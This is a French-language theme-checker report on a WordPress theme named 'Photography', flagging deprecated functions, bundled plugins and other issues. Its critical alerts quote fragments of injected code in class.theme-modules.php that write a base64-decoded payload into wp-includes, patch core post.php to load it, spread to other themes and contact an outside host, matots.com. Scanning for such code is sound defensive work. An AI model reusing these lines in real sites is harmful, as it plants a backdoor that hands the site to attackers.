0
Résultats de validation

Photography

Photography

WordPress 4.9.7 theme
0
Alertes critiques
  1. Failles de sécurité : Modification des paramètres du serveur PHP ini_set trouvé dans le fichier class.theme-modules.php.
    Line 5: ini_set('display_errors', 0);
  2. Failles de sécurité : Utilisation de base64_decode() base64_decode trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 91: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  3. Fichiers indésirables : fichiers ou dossiers cachés .ds_store .codeclimate.yml .gitignore .travis.yml .jshintrc .jshintignore .editorconfig .github .jscsrc .simplecov .csslintrc .coveralls.yml a été trouvé.
  4. Présence d'iframes : Les iframes sont parfois utilisées pour charger du contenu non désirés ou du code malicieux sur des sites tiers <iframe id="ppb_preview_frame" src="<?php echo esc_url($preview_url); ?> trouvé dans le fichier functions.php.
    Line 1802: <iframe id='ppb_preview_frame' src='<?php echo esc_url($preview_url); ?>'><
    <iframe src="//www.youtube.com/embed/<?php echo esc_attr($portfolio_video_id); ?> trouvé dans le fichier single-portfolio-youtube.php.
    Line 25: <iframe src='//www.youtube.com/embed/<?php echo esc_attr($portfolio_video_i
    <iframe frameborder="0" src="//player.vimeo.com/video/<?php echo esc_attr($portfolio_video_id); ?> trouvé dans le fichier single-portfolio-vimeo.php.
    Line 25: <iframe frameborder='0' src='//player.vimeo.com/video/<?php echo esc_attr($
    <iframe frameborder="0" src="//player.vimeo.com/video/<?php echo esc_attr($page_ft_vimeo); ?> trouvé dans le fichier page-vimeo.php.
    Line 30: <iframe frameborder='0' src='//player.vimeo.com/video/<?php echo esc_attr($
    <iframe src="//www.youtube.com/embed/<?php echo esc_attr($page_ft_youtube); ?> trouvé dans le fichier page-youtube.php.
    Line 30: <iframe src='//www.youtube.com/embed/<?php echo esc_attr($page_ft_youtube);
  5. Code malveillant : Opérations sur système de fichiers file_get_contents trouvé dans le fichier functions.php.
    Line 2287: $import_customizer_serialize = file_get_contents($default_dat_customizer);
    file_get_contents trouvé dans le fichier custom.lib.php.
    Line 370: $file = file_get_contents($flickr_cache_path);
    file_get_contents trouvé dans le fichier parsers.php.
    Line 66: $success = $dom->loadXML( file_get_contents( $file ) );
    Line 296: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {
    file_get_contents trouvé dans le fichier parsers.php.
    Line 66: $success = $dom->loadXML( file_get_contents( $file ) );
    Line 296: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {
    fopen trouvé dans le fichier parsers.php.
    Line 442: $fp = $this->fopen( $file, 'r' );
    Line 668: function fopen( $filename, $mode = 'r' ) {
    Line 671: return fopen( $filename, $mode );
    fclose trouvé dans le fichier parsers.php.
    Line 491: $this->fclose($fp);
    Line 686: function fclose( $fp ) {
    Line 689: return fclose( $fp );
    fopen trouvé dans le fichier parsers.php.
    Line 442: $fp = $this->fopen( $file, 'r' );
    Line 668: function fopen( $filename, $mode = 'r' ) {
    Line 671: return fopen( $filename, $mode );
    fopen trouvé dans le fichier parsers.php.
    Line 442: $fp = $this->fopen( $file, 'r' );
    Line 668: function fopen( $filename, $mode = 'r' ) {
    Line 671: return fopen( $filename, $mode );
    fclose trouvé dans le fichier parsers.php.
    Line 491: $this->fclose($fp);
    Line 686: function fclose( $fp ) {
    Line 689: return fclose( $fp );
    fclose trouvé dans le fichier parsers.php.
    Line 491: $this->fclose($fp);
    Line 686: function fclose( $fp ) {
    Line 689: return fclose( $fp );
    file_put_contents trouvé dans le fichier instagram.php.
    Line 159: file_put_contents($cachefile, $request);
    file_get_contents trouvé dans le fichier instagram.php.
    Line 168: $query = json_decode(file_get_contents($cachefile));
    file_get_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_put_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_put_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.matots.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.matots.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier page.fields.php.
    Line 282: $import_options_json = file_get_contents($cache_dir.'/'.$new_filename);
    Line 299: $import_options_json = file_get_contents(get_template_directory().'/cache/demos/pages/'.$_POST['pp
    Line 315: $import_options_json = file_get_contents($_FILES['ppb_import_current_file']['tmp_name']);
    file_get_contents trouvé dans le fichier page.fields.php.
    Line 282: $import_options_json = file_get_contents($cache_dir.'/'.$new_filename);
    Line 299: $import_options_json = file_get_contents(get_template_directory().'/cache/demos/pages/'.$_POST['pp
    Line 315: $import_options_json = file_get_contents($_FILES['ppb_import_current_file']['tmp_name']);
    file_get_contents trouvé dans le fichier page.fields.php.
    Line 282: $import_options_json = file_get_contents($cache_dir.'/'.$new_filename);
    Line 299: $import_options_json = file_get_contents(get_template_directory().'/cache/demos/pages/'.$_POST['pp
    Line 315: $import_options_json = file_get_contents($_FILES['ppb_import_current_file']['tmp_name']);
  6. Code malveillant : Opérations réseau curl_init trouvé dans le fichier envato.lib.php.
    Line 95: $ch = curl_init($url);
    curl_exec trouvé dans le fichier envato.lib.php.
    Line 106: $data = curl_exec($ch);
  7. Fonctions obsolètes : screen_icon screen_icon trouvé dans le fichier wordpress-importer.php . Obsolète depuis la version de la 3.8.
    Line 1118: screen_icon();
  8. Fonctions obsolètes : wp_get_http wp_get_http trouvé dans le fichier wordpress-importer.php . Obsolète depuis la version de la 4.4. Il est prérable d'utiliser WP_Http à la place.
    Line 991: $headers = wp_get_http( $url, $upload['file'] );
  9. Inclusion de plugin : Présence de fichier zip Les plugins ne sont pas autorisés dans les thèmes. Le fichier zip revslider.zip envato-market.zip photography-custom-post.zip about-me-header.zip home-5-slider.zip home-4-slider.zip home-8-slider.zip home-11-slider.zip service-slider.zip home9-slider.zip home3-slider.zip a été trouvé.
Attention
  1. Script de core désabonné : Désabonnement d'un script de coreAppel à wp_deregister_script dans theme.filter.lib.php. Les thèmes ne doivent appeler wp_deregister_script sur des scripts du core.
    Line 841: wp_deregister_script('heartbeat');
  2. Text domain : Utilisation incorrecte des fonctions de traduction.Plusieurs text-domain sont utilisés dans le thème. Cela signifie que le thème n'est pas compatible avec les language packs de WordPress. Les domaines trouvés sont photography-translation, tgmpa, wordpress-importer, envato, textdomain, kirki, photography, grandnews.
  3. Répertoires indésirables : Répertoire de control de version GITGIT revision control directory.git a été trouvé.
  4. Barre d'admin cachée : Barre d'admin cachée dans CSSLes thèmes ne doivent pas cacher la barre d'admin. Détecté dans le fichier functions.css.
  5. Eléments custom : Présence d'une entête customAucune référence à custom header n'a été trouvée dans le thème.
  6. Fonctions obsolètes : screen_iconscreen_icon trouvé dans le fichier wordpress-importer.php . Obsolète depuis la version de la 3.8.
    Line 1118: screen_icon();
  7. Editor style : Présence de l'édition de styleAucune référence à add_editor_style() n'a été trouvée dans le thème. Il est recommandé que le thème implémente l'édition de style, de manière à faire correspondre le contenu de l'éditeur l'affichage dans le thème.
  8. Screenshot : Copie d'écranLa taille du screenshot est 880x660px. La taille recommandée est 1200x900, pour prendre en compte les affichages HiDPI. Bien qu'une résolution de 1200x900 soit recommandée, toutes les images au format 4:3 sont acceptables.Mauvaise extension de fichier screenshot ! Le fichier screenshot.png n'est pas un véritable fichier JPG. Le type détecté est : "image/png".
Info
  1. Liens statiques : Présence de liens codés en durLien potentiellement codés en dur trouvé dans le fichier footer.php.
    Line 522: <a href='http://themegoods.theme-demo.net/photographyresponsivephotographytheme' cla
    Line 524: <a href='http://themes.themegoods.com/photography/landing2/customers-sites/' class='
    Line 526: <a href='http://themes.themegoods.com/photography/doc' class='demotip' title='Theme 
    Lien potentiellement codés en dur trouvé dans le fichier admin.lib.php.
    Line 240: <a href='https://themegoods.ticksy.com/submit/' target='_blank'>
    Line 291: $product_registration_html.='<br style='clear:both;'/><div style='height:20px'></div><div class='tg_error'><span class='dashicons dashicons-warning'></span> We can\'t find your purchase of '.THEMENAME.' theme. Please make sure you enter correct Envato Token. If you are sure you enter correct one. <a href='https://themegoods.ticksy.com' target='_blank'>Please open a ticket</a> to 
    Line 628: 'desc' => 'Enter Google Maps API Key <a href=\'https://themegoods.ticksy.com/article/7785/\' target=\'_blank\'>How to get 
    Line 322: <div class='getting_started_desc'>To enable auto update feature. You first must <a href=''.admin_url('themes.php?page=install-required-plugins').''>install Envato Market plugin</a> and enter your purchase code there. <a href='https://help.market.envato.com/hc/en-us/articles/202822600-Where-Is-My-Purc
    Lien potentiellement codés en dur trouvé dans le fichier widgets.lib.php.
    Line 299: <p><label for='<?php echo esc_attr($this->get_field_id('flickr_id')); ?>'>Flickr ID <a href='http://idgettr.com/'>Find your Flickr ID here</a>: <input class='widefat' i
    Line 461: <p><label for='<?php echo esc_attr($this->get_field_id('lat')); ?>'>Latitude (<a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 463: <p><label for='<?php echo esc_attr($this->get_field_id('long')); ?>'>Longitude (<a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 461: <p><label for='<?php echo esc_attr($this->get_field_id('lat')); ?>'>Latitude (<a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 463: <p><label for='<?php echo esc_attr($this->get_field_id('long')); ?>'>Longitude (<a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Lien potentiellement codés en dur trouvé dans le fichier shortcode_generator.php.
    Line 304: 'lat' => 'Map latitude <a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 305: 'long' => 'Map longitude <a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 304: 'lat' => 'Map latitude <a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 305: 'long' => 'Map longitude <a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 487: 'icon' => 'Enter icon class name ex. fa-star. <a href='http://fontawesome.io/cheatsheet/'>See all possible here</a>',
  2. Fichiers optionnels : Présence du fichierde style pour les écritures de droite vers la gauche rtl.cssCe thème ne contient pas le fichier optionnel rtl.php.
  3. Fichiers optionnels : Présence du fichier-template fron-*page.phpCe thème ne contient pas le fichier optionnel front-page.php.
  4. Fichiers optionnels : Présence du fichier-template de page d'accueil home.phpCe thème ne contient pas le fichier optionnel home.php.
  5. Fichiers optionnels : Présence du fichier template de taxinomie taxonomy.phpCe thème ne contient pas le fichier optionnel taxonomy.php.
  6. Fichiers optionnels : Présence du fichier-template author.phpCe thème ne contient pas le fichier optionnel author.php.
  7. Fichiers optionnels : Présence de du fichier-template des dates et heures date.phpCe thème ne contient pas le fichier optionnel date.php.
  8. Fichiers optionnels : Présence du fichier-template des pièces jointes attachment.phpCe thème ne contient pas le fichier optionnel attachment.php.
  9. Fichiers optionnels : Présence du fichier-template des images image.phpCe thème ne contient pas le fichier optionnel image.php.
  10. Utilisation d'includes : Utilisation de include ou de de requireLe thème semble utiliser include ou require : admin.lib.php
    Line 172: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : config.lib.php
    Line 46: require_once(ABSPATH . 'wp-admin/includes/file.php');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-envato-wordpress-theme-upgrader.php
    Line 11: include_once( ABSPATH . 'wp-admin/includes/class-wp-upgrader.php' );
    Line 13: include_once( 'class-envato-protected-api.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : script-responsive-css.php
    Line 24: require_once(get_template_directory().'/css/grid.css');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : test-kirki-add_config.php
    Line 9: require_once( ABSPATH . WPINC . '/class-wp-customize-manager.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-kirki-control-fontawesome.php
    Line 42: include( $json_path );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-kirki-helper.php
    Line 83: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : js-wp-editor.php
    Line 35: require( ABSPATH . WPINC . '/class-wp-editor.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class.theme-modules.php
    Line 44: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.

